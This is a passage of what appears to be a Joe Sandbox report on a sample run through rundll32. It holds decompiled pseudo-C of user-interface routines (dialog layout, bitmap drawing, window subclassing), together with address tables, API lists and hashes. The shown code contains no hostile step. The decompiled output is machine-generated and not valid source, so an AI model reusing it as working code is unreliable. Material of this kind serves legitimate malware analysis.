				void* _t382;
				signed int _t424;
				signed int _t427;
				intOrPtr _t446;
				void* _t453;
				CHAR* _t462;
				int _t466;
				intOrPtr* _t467;
				intOrPtr _t468;
				intOrPtr* _t473;
				void* _t474;
				void* _t476;
				void* _t480;
				void* _t484;
				void* _t488;
				void* _t493;
				void* _t494;
				void* _t503;
				void* _t509;

				_t509 = __fp0;
				_v116 = 0;
				_v112 = 0;
				_v108 = 0;
				_v104 = 0;
				_v11 = __ecx;
				_v9 = __edx;
				_v8 = __eax;
				 *[fs:eax] = _t476 + 0xffffff90;
				_v16 = E028023E0(1, __edi);
				 *((intOrPtr*)( *_v16 + 0x70))( *[fs:eax], 0x2802e28, _t476, __edi, __esi, __ebx, _t474);
				E02816DE4(_v16, 3);
				E027F83E8(E028171C0(_v16));
				 *((char*)(_v16 + 0x22d)) = 1;
				_t206 = _v16;
				 *((intOrPtr*)(_t206 + 0x1dc)) = _v16;
				 *((intOrPtr*)(_t206 + 0x1d8)) = E02802470;
				E02802214(E028171C0(_v16),  &_v24);
				_t378 = _v24;
				_v28 = MulDiv(8, _t378, 4);
				_t466 = _v20;
				_v32 = MulDiv(8, _t466, 8);
				_v36 = MulDiv(0xa, _t378, 4);
				_v40 = MulDiv(0xa, _t466, 8);
				_v44 = MulDiv(0x32, _t378, 4);
				_t379 = 0;
				_t467 = 0x2865a84;
				_v80 = 0x2863984;
				do {
					_t480 = _t379 - 0xf;
					if(_t480 <= 0) {
						asm("bt [ebp-0x7], eax");
					}
					if(_t480 < 0) {
						if( *_t467 == 0) {
							E027E9BA4(0, 0, 0,  &_v100, 0);
							_t360 = E0282FAA8(_v16);
							E027D6018( *_v80,  &_v104);
							_t367 = E027D45A8(_v104);
							DrawTextA(E027F84EC(E028171C0(_v16)), _t367, 0xffffffff,  &_v100, _t360 | 0x00000420);
							 *_t467 = _v100.right - _v100.left + 8;
						}
						_t355 =  *_t467;
						if(_t355 > _v44) {
							_v44 = _t355;
						}
					}
					_t379 = _t379 + 1;
					_v80 = _v80 + 4;
					_t467 = _t467 + 4;
					_t484 = _t379 - 0xb;
				} while (_t484 != 0);
				_v48 = MulDiv(0xe, _v20, 8);
				_v52 = MulDiv(4, _v24, 4);
				_push(0);
				_t220 =  *0x2864774; // 0x2865b5c
				_t223 = E0281B960( *_t220) >> 1;
				if(_t484 < 0) {
					asm("adc eax, 0x0");
				}
				SetRect( &_v100, 0, 0, _t223, ??);
				_t227 = E0282FAA8(_v16);
				_t231 = E027D43A8(_v8);
				_t234 = E027D45A8(_v8);
				DrawTextA(E027F84EC(E028171C0(_v16)), _t234, _t231 + 1,  &_v100, _t227 | 0x00000450);
				_t462 =  *0x02863944;
				_t468 = _v100.right;
				_v56 = _v100.bottom;
				if(_t462 != 0) {
					_t468 = _t468 + _v36 + 0x20;
					if(_v56 < 0x20) {
						_v56 = 0x20;
					}
				}
				_t242 = 0;
				_t380 = 0;
				do {
					_t488 = _t380 - 0xf;
					if(_t488 <= 0) {
						asm("bt [ebp-0x7], edx");
					}
					if(_t488 < 0) {
						_t242 = _t242 + 1;
					}
					_t380 = _t380 + 1;
				} while (_t380 != 0xb);
				_t381 = 0;
				if(_t242 != 0) {
					_t381 = _v44 * _t242 + (_t242 - 1) * _v52;
				}
				E02816288(_v16, E027FE86C(_t468, _t381) + _v28 + _v28);
				_t493 = _v56 + _v48 + _v40 + _v32 + _v32;
				E028162D8(_v16, _v56 + _v48 + _v40 + _v32 + _v32);
				_t253 =  *0x2864774; // 0x2865b5c
				_t424 = E0281B960( *_t253) >> 1;
				if(_t493 < 0) {
					asm("adc edx, 0x0");
				}
				_t258 =  *(_v16 + 0x48) >> 1;
				if(_t493 < 0) {
					asm("adc eax, 0x0");
				}
				_t494 = _t424 - _t258;
				E0282CE98(_v16);
				_t261 =  *0x2864774; // 0x2865b5c
				_t427 = E0281B940( *_t261) >> 1;
				if(_t494 < 0) {
					asm("adc edx, 0x0");
				}
				_t266 =  *(_v16 + 0x4c) >> 1;
				if(_t494 < 0) {
					asm("adc eax, 0x0");
				}
				E0282CEBC(_v16, _t427 - _t266);
				if(_v9 == 4) {
					_t269 =  *0x28645d4; // 0x2865b58
					E0281E19C( *_t269,  &_v112);
					E0282D780(_v16, _t381, _v112, _t468);
				} else {
					E027D6018( *0x02863930,  &_v108);
					E0282D780(_v16, _t381, _v108, _t468);
				}
				_t496 = _t462;
				if(_t462 != 0) {
					_v72 = E02803800(1);
					 *((intOrPtr*)( *_v72 + 0x18))();
					 *((intOrPtr*)( *_v72 + 0x68))();
					_push(LoadIconA(0, _t462));
					_t341 = E027FA3BC( *((intOrPtr*)(_v72 + 0x168)));
					_pop(_t453);
					E027FE1D0(_t341, _t453);
					 *((intOrPtr*)( *_v72 + 0x84))(0x20, 0x20);
				}
				_t463 = E0280CE70(_v16, 1);
				 *((intOrPtr*)(_v16 + 0x2f8)) = _t463;
				 *((intOrPtr*)( *_t463 + 0x18))();
				 *((intOrPtr*)( *_t463 + 0x68))();
				E0280D348(_t463, 1);
				E0282D780(_t463, _t381, _v8, _t468);
				E0282D110(_t463,  &_v100);
				 *((intOrPtr*)( *_t463 + 0x70))();
				_v64 = _t468 - _v100.right + _v28;
				if(E027D3408(_t463, _t496) != 0) {
					_v64 = E0282D154(_v16) - _v64 -  *((intOrPtr*)(_t463 + 0x48));
				}
				 *((intOrPtr*)( *_t463 + 0x84))(_v100.bottom, _v100.right);
				if((_v11 & 0x00000004) == 0) {
					__eflags = _v11 & 0x00000001;
					if((_v11 & 0x00000001) == 0) {
						_v65 = 5;
					} else {
						_v65 = 0;
					}
				} else {
					_v65 = 2;
				}
				if((_v11 & 0x00000008) == 0) {
					__eflags = _v11 & 0x00000002;
					if((_v11 & 0x00000002) == 0) {
						_v66 = 2;
					} else {
						_v66 = 1;
					}
				} else {
					_v66 = 3;
				}
				_t298 = E0282D154(_v16) - _t381;
				_t299 = _t298 >> 1;
				if(_t298 < 0) {
					asm("adc eax, 0x0");
				}
				_v60 = _t299;
				_t382 = 0;
				_v80 = 0x2863958;
				_t473 = 0x2863984;
				_v84 = 0x28639b0;
				do {
					_t503 = _t382 - 0xf;
					if(_t503 <= 0) {
						asm("bt [ebp-0x7], eax");
					}
					if(_t503 < 0) {
						_v76 = E0280E628(_v16, 1, _t463, _t509);
						 *((intOrPtr*)( *_v76 + 0x18))();
						 *((intOrPtr*)( *_v76 + 0x68))();
						E027D6018( *_t473,  &_v116);
						E0282D780(_v76, _t382, _v116, _t473);
						 *((intOrPtr*)(_v76 + 0x214)) =  *_v84;
						_t504 = _t382 - _v65;
						if(_t382 == _v65) {
							E0280E708(_v76, 1, _t504);
						}
						if(_t382 == _v66) {
							 *((char*)(_v76 + 0x211)) = 1;
						}
						_t463 =  *_v76;
						 *((intOrPtr*)( *_v76 + 0x84))(_v48, _v44);
						_v60 = _v60 + _v44 + _v52;
						if(_t382 == 0xa) {
							_t323 = _v76;
							 *((intOrPtr*)(_t323 + 0x124)) = _v16;
							 *((intOrPtr*)(_t323 + 0x120)) = 0x2802458;
						}
					}
					_t382 = _t382 + 1;
					_v84 = _v84 + 4;
					_t473 = _t473 + 4;
					_v80 = _v80 + 4;
				} while (_t382 != 0xb);
				_pop(_t446);
				 *[fs:eax] = _t446;
				_push(0x2802e2f);
				return E027D410C( &_v116, 4);
			}








































































                          0x028028b8
                          0x028028c3
                          0x028028c6
                          0x028028c9
                          0x028028cc
                          0x028028cf
                          0x028028d3
                          0x028028d6
                          0x028028e4
                          0x028028fb
                          0x0280290d
                          0x02802915
                          0x02802928
                          0x02802930
                          0x02802937
                          0x0280293d
                          0x02802943
                          0x02802958
                          0x0280295f
                          0x0280296a
                          0x0280296f
                          0x0280297a
                          0x02802987
                          0x02802994
                          0x028029a1
                          0x028029a4
                          0x028029a6
                          0x028029ab
                          0x028029b2
                          0x028029b4
                          0x028029b6
                          0x028029bb
                          0x028029bb
                          0x028029bf
                          0x028029c4
                          0x028029d2
                          0x028029da
                          0x028029f3
                          0x028029fb
                          0x02802a0f
                          0x02802a1d
                          0x02802a1d
                          0x02802a1f
                          0x02802a24
                          0x02802a26
                          0x02802a26
                          0x02802a24
                          0x02802a29
                          0x02802a2a
                          0x02802a2e
                          0x02802a31
                          0x02802a31
                          0x02802a47
                          0x02802a57
                          0x02802a5a
                          0x02802a5c
                          0x02802a68
                          0x02802a6a
                          0x02802a6c
                          0x02802a6c
                          0x02802a78
                          0x02802a80
                          0x02802a92
                          0x02802a9c
                          0x02802ab0
                          0x02802aba
                          0x02802ac1
                          0x02802ac7
                          0x02802acc
                          0x02802ad4
                          0x02802ada
                          0x02802adc
                          0x02802adc
                          0x02802ada
                          0x02802ae3
                          0x02802ae5
                          0x02802ae7
                          0x02802ae9
                          0x02802aec
                          0x02802af1
                          0x02802af1
                          0x02802af5
                          0x02802af7
                          0x02802af7
                          0x02802af8
                          0x02802af9
                          0x02802afe
                          0x02802b02
                          0x02802b0e
                          0x02802b0e
                          0x02802b25
                          0x02802b38
                          0x02802b3d
                          0x02802b42
                          0x02802b50
                          0x02802b52
                          0x02802b54
                          0x02802b54
                          0x02802b5d
                          0x02802b5f
                          0x02802b61
                          0x02802b61
                          0x02802b64
                          0x02802b69
                          0x02802b6e
                          0x02802b7c
                          0x02802b7e
                          0x02802b80
                          0x02802b80
                          0x02802b89
                          0x02802b8b
                          0x02802b8d
                          0x02802b8d
                          0x02802b95
                          0x02802b9e
                          0x02802bc4
                          0x02802bcb
                          0x02802bd6
                          0x02802ba0
                          0x02802baf
                          0x02802bba
                          0x02802bba
                          0x02802bdb
                          0x02802bdd
                          0x02802bee
                          0x02802bfb
                          0x02802c06
                          0x02802c11
                          0x02802c1b
                          0x02802c20
                          0x02802c21
                          0x02802c35
                          0x02802c35
                          0x02802c4a
                          0x02802c4f
                          0x02802c5e
                          0x02802c68
                          0x02802c6f
                          0x02802c79
                          0x02802c83
                          0x02802c92
                          0x02802c9b
                          0x02802cab
                          0x02802cbb
                          0x02802cbb
                          0x02802cd0
                          0x02802cda
                          0x02802ce2
                          0x02802ce6
                          0x02802cee
                          0x02802ce8
                          0x02802ce8
                          0x02802ce8
                          0x02802cdc
                          0x02802cdc
                          0x02802cdc
                          0x02802cf6
                          0x02802cfe
                          0x02802d02
                          0x02802d0a
                          0x02802d04
                          0x02802d04
                          0x02802d04
                          0x02802cf8
                          0x02802cf8
                          0x02802cf8
                          0x02802d16
                          0x02802d18
                          0x02802d1a
                          0x02802d1c
                          0x02802d1c
                          0x02802d1f
                          0x02802d22
                          0x02802d24
                          0x02802d2b
                          0x02802d30
                          0x02802d37
                          0x02802d39
                          0x02802d3b
                          0x02802d40
                          0x02802d40
                          0x02802d44
                          0x02802d59
                          0x02802d66
                          0x02802d71
                          0x02802d79
                          0x02802d84
                          0x02802d91
                          0x02802d97
                          0x02802d9a
                          0x02802da1
                          0x02802da1
                          0x02802da9
                          0x02802dae
                          0x02802dae
                          0x02802dcc
                          0x02802dce
                          0x02802dda
                          0x02802de0
                          0x02802de2
                          0x02802de8
                          0x02802dee
                          0x02802dee
                          0x02802de0
                          0x02802df8
                          0x02802df9
                          0x02802dfd
                          0x02802e00
                          0x02802e04
                          0x02802e0f
                          0x02802e12
                          0x02802e15
                          0x02802e27

                          APIs
                            • Part of subcall function 028023E0: SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 0280241D
                            • Part of subcall function 028023E0: CreateFontIndirectA.GDI32(?), ref: 0280242A
                            • Part of subcall function 02802214: GetTextExtentPointA.GDI32(00000000,00000034,00000034,?), ref: 0280224F
                          • MulDiv.KERNEL32(00000008,?,00000004), ref: 02802965
                          • MulDiv.KERNEL32(00000008,?,00000008), ref: 02802975
                          • MulDiv.KERNEL32(0000000A,?,00000004), ref: 02802982
                          • MulDiv.KERNEL32(0000000A,?,00000008), ref: 0280298F
                          • MulDiv.KERNEL32(00000032,?,00000004), ref: 0280299C
                          • DrawTextA.USER32(00000000,00000000,000000FF,?,00000000), ref: 02802A0F
                          • MulDiv.KERNEL32(0000000E,?,00000008), ref: 02802A42
                          • MulDiv.KERNEL32(00000004,?,00000004), ref: 02802A52
                          • SetRect.USER32(?,00000000,00000000,00000000,00000000), ref: 02802A78
                          • DrawTextA.USER32(00000000,00000000,00000001,?,00000000), ref: 02802AB0
                          • LoadIconA.USER32(00000000), ref: 02802C0C
                            • Part of subcall function 0281E19C: GetWindowTextA.USER32(?,?,00000100), ref: 0281E1CA
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Text$Draw$CreateExtentFontIconIndirectInfoLoadParametersPointRectSystemWindow
                          • String ID: $Image$Message
                          • API String ID: 4220236395-721294388
                          • Opcode ID: 4976d138be8a26e5bcb852554a49b174caa6048a132440e5c1c7bfe54fc779be
                          • Instruction ID: 9c970debe127153f04e4fe0166670e3cffdf4c8b740ffebb39b8d03689a7120b
                          • Opcode Fuzzy Hash: 4976d138be8a26e5bcb852554a49b174caa6048a132440e5c1c7bfe54fc779be
                          • Instruction Fuzzy Hash: 65022879E002089FDB51EFA8C888B9DBBB6EF49304F1481A5E904EB395DB70AD45CF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02805070 Relevance: 23.0, APIs: 15, Instructions: 468COMMON
                          Download Yara Rule
                          C-Code - Quality: 83%
                          			E02805070(intOrPtr __eax, char __edx) {
				intOrPtr _v8;
				char _v9;
				intOrPtr* _v16;
				intOrPtr* _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				char _v44;
				char _v60;
				void* __edi;
				void* __ebp;
				signed int _t170;
				signed int _t176;
				void* _t209;
				void* _t213;
				intOrPtr _t218;
				intOrPtr _t241;
				void* _t254;
				struct HDC__* _t273;
				struct HDC__* _t287;
				void* _t327;
				void* _t348;
				void* _t365;
				void* _t372;
				intOrPtr _t387;
				intOrPtr _t393;
				struct HDC__* _t397;
				struct HDC__* _t398;
				struct HDC__* _t399;
				void* _t426;
				void* _t427;
				void* _t428;
				intOrPtr _t452;
				intOrPtr _t469;
				void* _t483;
				int _t491;
				int _t496;
				void* _t498;
				void* _t500;
				intOrPtr _t501;
				void* _t511;

				_t498 = _t500;
				_t501 = _t500 + 0xffffffc8;
				_v9 = __edx;
				_v8 = __eax;
				if(_v9 == 2 &&  *(_v8 + 0x20) < 3) {
					_v9 = 0;
				}
				_t393 =  *((intOrPtr*)(_v8 + 0xc));
				if(_t393 != 0xffffffff) {
					L24:
					return _t393;
				} else {
					_t170 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x2c))();
					if((_t170 |  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x20))()) == 0) {
						goto L24;
					} else {
						_t176 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x2c))();
						asm("cdq");
						_t491 = _t176 / ( *(_v8 + 0x20) & 0x000000ff);
						_t496 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x20))();
						if( *((intOrPtr*)(_v8 + 8)) == 0) {
							_t508 =  *0x2863b80;
							if( *0x2863b80 == 0) {
								 *0x2863b80 = E02804D68(1);
							}
							_t387 =  *0x2863b80; // 0x0
							 *((intOrPtr*)(_v8 + 8)) = E02804DDC(_t387, _t496, _t491);
						}
						_v16 = E027FC2CC(1);
						 *[fs:eax] = _t501;
						 *((intOrPtr*)( *_v16 + 0x40))( *[fs:eax], 0x280561f, _t498);
						 *((intOrPtr*)( *_v16 + 0x34))();
						E027E9BA4(0, _t491, 0,  &_v44, _t496);
						E027F7CA4( *((intOrPtr*)(E027FC894(_v16) + 0x14)), _t491, 0xff00000f, _t491, _t498, _t508);
						E027FC05C( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x24))());
						 *((intOrPtr*)( *_v16 + 0x38))();
						if(_v9 >=  *(_v8 + 0x20)) {
						}
						E027E9BA4(0 * _t491, 1 * _t491, 0,  &_v60, _t496);
						_t209 = _v9 - 1;
						_t511 = _t209;
						if(_t511 < 0) {
							L14:
							_push( &_v60);
							_t213 = E027FC894( *((intOrPtr*)(_v8 + 4)));
							E027F7FA4(E027FC894(_v16),  &_v44, _t512, _t213);
							_t218 =  *((intOrPtr*)(_v8 + 4));
							_t513 =  *((char*)(_t218 + 0x38)) - 1;
							if( *((char*)(_t218 + 0x38)) != 1) {
								 *((intOrPtr*)(_v8 + 0xc)) = E02804D0C( *((intOrPtr*)(_v8 + 8)), 0x20000000, _v16, __eflags);
							} else {
								 *((intOrPtr*)(_v8 + 0xc)) = E02804D0C( *((intOrPtr*)(_v8 + 8)),  *((intOrPtr*)(_v8 + 0x1c)), _v16, _t513);
							}
							goto L23;
						} else {
							if(_t511 == 0) {
								_v24 = 0;
								_v20 = 0;
								 *[fs:eax] = _t501;
								_v24 = E027FC2CC(1);
								_v20 = E027FC2CC(1);
								 *((intOrPtr*)( *_v20 + 8))( *[fs:eax], 0x28055e3, _t498);
								 *((intOrPtr*)( *_v20 + 0x6c))();
								_t241 = _v8;
								__eflags =  *((char*)(_t241 + 0x20)) - 1;
								if( *((char*)(_t241 + 0x20)) <= 1) {
									 *((intOrPtr*)( *_v24 + 8))();
									 *((intOrPtr*)( *_v24 + 0x6c))();
									E027F7CA4( *((intOrPtr*)(E027FC894(_v24) + 0x14)),  *_v24, 0, _t491, _t498, __eflags);
									_t420 =  *_v24;
									 *((intOrPtr*)( *_v24 + 0x40))();
									_t254 = E027FC950(_v24);
									__eflags = _t254;
									if(_t254 != 0) {
										E027F74D8( *((intOrPtr*)(E027FC894(_v24) + 0xc)), 0xffffff);
										__eflags = 0;
										E027FD6F0(_v24, 0);
										E027F7CA4( *((intOrPtr*)(E027FC894(_v24) + 0x14)), _t420, 0xffffff, _t491, _t498, __eflags);
									}
									E027FD6F0(_v24, 1);
									_t396 = E027FC894(_v16);
									E027F7CA4( *((intOrPtr*)(_t258 + 0x14)), _t420, 0xff00000f, _t491, _t498, __eflags);
									E027F80D8(_t258,  &_v44);
									E027F7CA4( *((intOrPtr*)(_t258 + 0x14)), _t420, 0xff000014, _t491, _t498, __eflags);
									SetTextColor(E027F84EC(_t396), 0);
									SetBkColor(E027F84EC(_t396), 0xffffff);
									_t273 = E027F84EC(E027FC894(_v24));
									BitBlt(E027F84EC(_t396), 1, 1, _t491, _t496, _t273, 0, 0, 0xe20746);
									E027F7CA4( *((intOrPtr*)(_t396 + 0x14)), _t420, 0xff000010, _t491, _t498, __eflags);
									SetTextColor(E027F84EC(_t396), 0);
									SetBkColor(E027F84EC(_t396), 0xffffff);
									_t287 = E027F84EC(E027FC894(_v24));
									BitBlt(E027F84EC(_t396), 0, 0, _t491, _t496, _t287, 0, 0, 0xe20746);
								} else {
									_v28 = E027FC894(_v16);
									E027FC894(_v20);
									E027F7FA4(_v28,  &_v44, __eflags,  &_v60);
									E027FD6F0(_v24, 1);
									 *((intOrPtr*)( *_v24 + 0x40))();
									 *((intOrPtr*)( *_v24 + 0x34))();
									E027F7CA4( *((intOrPtr*)(E027FC894(_v20) + 0x14)),  *_v24, 0xffffff, _t491, _t498, __eflags);
									_push( &_v60);
									_push(E027FC894(_v20));
									_t327 = E027FC894(_v24);
									_pop(_t426);
									E027F7FA4(_t327,  &_v44, __eflags);
									E027F7CA4( *((intOrPtr*)(_v28 + 0x14)), _t426, 0xff000014, _t491, _t498, __eflags);
									_t397 = E027F84EC(_v28);
									SetTextColor(_t397, 0);
									SetBkColor(_t397, 0xffffff);
									BitBlt(_t397, 0, 0, _t491, _t496, E027F84EC(E027FC894(_v24)), 0, 0, 0xe20746);
									E027F7CA4( *((intOrPtr*)(E027FC894(_v20) + 0x14)), _t426, 0x808080, _t491, _t498, __eflags);
									_push( &_v60);
									_push(E027FC894(_v20));
									_t348 = E027FC894(_v24);
									_pop(_t427);
									E027F7FA4(_t348,  &_v44, __eflags);
									E027F7CA4( *((intOrPtr*)(_v28 + 0x14)), _t427, 0xff000010, _t491, _t498, __eflags);
									_t398 = E027F84EC(_v28);
									SetTextColor(_t398, 0);
									SetBkColor(_t398, 0xffffff);
									BitBlt(_t398, 0, 0, _t491, _t496, E027F84EC(E027FC894(_v24)), 0, 0, 0xe20746);
									_push(E027F7018( *((intOrPtr*)(_v8 + 0x1c))));
									_t365 = E027FC894(_v20);
									_pop(_t483);
									E027F7CA4( *((intOrPtr*)(_t365 + 0x14)), _t427, _t483, _t491, _t498, __eflags);
									_push( &_v60);
									_push(E027FC894(_v20));
									_t372 = E027FC894(_v24);
									_pop(_t428);
									E027F7FA4(_t372,  &_v44, __eflags);
									E027F7CA4( *((intOrPtr*)(_v28 + 0x14)), _t428, 0xff00000f, _t491, _t498, __eflags);
									_t399 = E027F84EC(_v28);
									SetTextColor(_t399, 0);
									SetBkColor(_t399, 0xffffff);
									BitBlt(_t399, 0, 0, _t491, _t496, E027F84EC(E027FC894(_v24)), 0, 0, 0xe20746);
								}
								__eflags = 0;
								_pop(_t469);
								 *[fs:eax] = _t469;
								_push(0x28055ea);
								E027D320C(_v20);
								return E027D320C(_v24);
							} else {
								_t512 = _t209 - 0xffffffffffffffff;
								if(_t209 - 0xffffffffffffffff < 0) {
									goto L14;
								}
								L23:
								_pop(_t452);
								 *[fs:eax] = _t452;
								_push(0x2805626);
								return E027D320C(_v16);
							}
						}
					}
				}
			}











































                          0x02805071
                          0x02805073
                          0x02805079
                          0x0280507c
                          0x02805083
                          0x0280508e
                          0x0280508e
                          0x0280509a
                          0x028050a1
                          0x0280563d
                          0x02805645
                          0x028050a7
                          0x028050af
                          0x028050c1
                          0x00000000
                          0x028050c7
                          0x028050cf
                          0x028050db
                          0x028050de
                          0x028050eb
                          0x028050f4
                          0x028050f6
                          0x028050fd
                          0x0280510b
                          0x0280510b
                          0x02805114
                          0x02805121
                          0x02805121
                          0x02805130
                          0x0280513e
                          0x02805148
                          0x02805152
                          0x02805160
                          0x02805175
                          0x02805185
                          0x02805191
                          0x0280519d
                          0x0280519d
                          0x028051b6
                          0x028051be
                          0x028051be
                          0x028051c0
                          0x028051cd
                          0x028051d0
                          0x028051d7
                          0x028051e9
                          0x028051f1
                          0x028051f4
                          0x028051f8
                          0x0280523a
                          0x028051fa
                          0x02805216
                          0x02805216
                          0x00000000
                          0x028051c2
                          0x028051c2
                          0x02805245
                          0x0280524a
                          0x02805258
                          0x02805267
                          0x02805276
                          0x02805284
                          0x0280528e
                          0x02805291
                          0x02805294
                          0x02805298
                          0x02805481
                          0x0280548b
                          0x0280549b
                          0x028054a5
                          0x028054a7
                          0x028054ad
                          0x028054b2
                          0x028054b4
                          0x028054c6
                          0x028054cb
                          0x028054d0
                          0x028054e5
                          0x028054e5
                          0x028054ef
                          0x028054fc
                          0x02805506
                          0x02805510
                          0x0280551d
                          0x0280552c
                          0x0280553e
                          0x02805554
                          0x02805568
                          0x02805575
                          0x02805584
                          0x02805596
                          0x028055ac
                          0x028055c0
                          0x0280529e
                          0x028052a6
                          0x028052b0
                          0x028052bd
                          0x028052c7
                          0x028052d3
                          0x028052dd
                          0x028052f0
                          0x028052f8
                          0x02805301
                          0x02805305
                          0x0280530d
                          0x0280530e
                          0x0280531e
                          0x0280532b
                          0x02805330
                          0x0280533b
                          0x0280535e
                          0x02805373
                          0x0280537b
                          0x02805384
                          0x02805388
                          0x02805390
                          0x02805391
                          0x028053a1
                          0x028053ae
                          0x028053b3
                          0x028053be
                          0x028053e1
                          0x028053f1
                          0x028053f5
                          0x028053fd
                          0x028053fe
                          0x02805406
                          0x0280540f
                          0x02805413
                          0x0280541b
                          0x0280541c
                          0x0280542c
                          0x02805439
                          0x0280543e
                          0x02805449
                          0x0280546c
                          0x0280546c
                          0x028055c5
                          0x028055c7
                          0x028055ca
                          0x028055cd
                          0x028055d5
                          0x028055e2
                          0x028051c4
                          0x028051c5
                          0x028051c7
                          0x00000000
                          0x00000000
                          0x02805609
                          0x0280560b
                          0x0280560e
                          0x02805611
                          0x0280561e
                          0x0280561e
                          0x028051c2
                          0x028051c0
                          0x028050c1

                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b507ec345ff6f6d7973229422eab21a3424af964a9c8a15ed97ac142f07321fb
                          • Instruction ID: 544ff1242e377144958d64510a84dc1c6e288905119b95222b2d3a954f398cd6
                          • Opcode Fuzzy Hash: b507ec345ff6f6d7973229422eab21a3424af964a9c8a15ed97ac142f07321fb
                          • Instruction Fuzzy Hash: 42023F74B04109AFDB55EFA8C989E9EBBFAAF48710F1045A5E504EB391CA71ED01CF21
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0280A184 Relevance: 21.2, APIs: 14, Instructions: 238windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 83%
                          			E0280A184(intOrPtr __eax, void* __ebx, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char* _t106;
				intOrPtr _t118;
				intOrPtr _t119;
				intOrPtr* _t133;
				long _t140;
				intOrPtr _t166;
				struct HWND__* _t195;
				long _t196;
				void* _t198;
				void* _t199;
				struct HWND__* _t200;
				void* _t201;
				intOrPtr _t212;
				intOrPtr _t214;
				intOrPtr _t218;
				struct HWND__* _t224;
				void* _t225;
				struct HWND__* _t226;
				struct HWND__* _t227;
				void* _t229;
				void* _t230;
				intOrPtr _t231;

				_t229 = _t230;
				_t231 = _t230 + 0xfffffff8;
				_v12 = 0;
				_v8 = __eax;
				_push(_t229);
				_push(0x280a497);
				_push( *[fs:eax]);
				 *[fs:eax] = _t231;
				E0280E14C(_v8);
				_t195 = GetWindow(E02833F7C(_v8), 5);
				 *(_v8 + 0x248) = _t195;
				_t224 = _t195;
				 *(_v8 + 0x270) = _t224;
				 *((intOrPtr*)(_v8 + 0x274)) = GetWindowLongA(_t224, 0xfffffffc);
				SetWindowLongA( *(_v8 + 0x270), 0xfffffffc,  *(_v8 + 0x278));
				if( *((intOrPtr*)(_v8 + 0x289)) - 2 < 0) {
					_t200 = GetWindow(GetWindow(E02833F7C(_v8), 5), 5);
					if(_t200 != 0) {
						if( *((char*)(_v8 + 0x289)) == 1) {
							_t227 = _t200;
							 *(_v8 + 0x244) = _t227;
							 *((intOrPtr*)(_v8 + 0x258)) = GetWindowLongA(_t227, 0xfffffffc);
							SetWindowLongA( *(_v8 + 0x244), 0xfffffffc,  *(_v8 + 0x254));
							_t200 = GetWindow(_t200, 2);
						}
						_t226 = _t200;
						 *(_v8 + 0x240) = _t226;
						 *((intOrPtr*)(_v8 + 0x250)) = GetWindowLongA(_t226, 0xfffffffc);
						SetWindowLongA( *(_v8 + 0x240), 0xfffffffc,  *(_v8 + 0x24c));
					}
				}
				_t106 =  *0x28644d4; // 0x2865b98
				if( *_t106 != 0 &&  *(_v8 + 0x240) != 0) {
					SendMessageA( *(_v8 + 0x240), 0xd3, 3, 0);
				}
				if( *((intOrPtr*)(_v8 + 0x284)) == 0) {
					__eflags =  *((intOrPtr*)(_v8 + 0x280));
					if(__eflags != 0) {
						_t140 = E028203AC( *((intOrPtr*)(_v8 + 0x280)));
						PostMessageA(E02833F7C(_v8), 0x402, 0, _t140);
					}
					E0280A4D0(_v8, _t201,  *((intOrPtr*)(_v8 + 0x28a)), __eflags);
					E027D5B38(_v8 + 0x268);
					_push(E027D5B38(_v8 + 0x268));
					_push(0x280a4a4);
					_push(1);
					_push(0);
					_t118 =  *0x28642dc; // 0x2863918
					_push(_t118);
					L027E81B8();
					_t119 = _v8;
					__eflags =  *((intOrPtr*)(_t119 + 0x268));
					if( *((intOrPtr*)(_t119 + 0x268)) != 0) {
						_t196 = SendMessageA(E02833F7C(_v8), 0x407, 0, 0);
						__eflags = _t196;
						if(_t196 != 0) {
							_t214 = E0280AC5C( *((intOrPtr*)(_v8 + 0x28c)), 1);
							__eflags = _t214;
							if(_t214 != 0) {
								__eflags = _t214;
							}
							E027D5B50( &_v12, _t214);
							_t133 =  *((intOrPtr*)(_v8 + 0x268));
							 *((intOrPtr*)( *_t133 + 0xc))(_t133, _t196, _v12, 0, 0);
							E0280A664(_v8, _t196, __eflags);
						}
					}
					__eflags = 0;
					_pop(_t212);
					 *[fs:eax] = _t212;
					_push(0x280a49e);
					return E027D5B38( &_v12);
				} else {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x28c)))) + 0x20))();
					 *((char*)(_v8 + 0x288)) = 1;
					 *[fs:eax] = _t231;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x28c)))) + 8))( *[fs:eax], 0x280a39b, _t229);
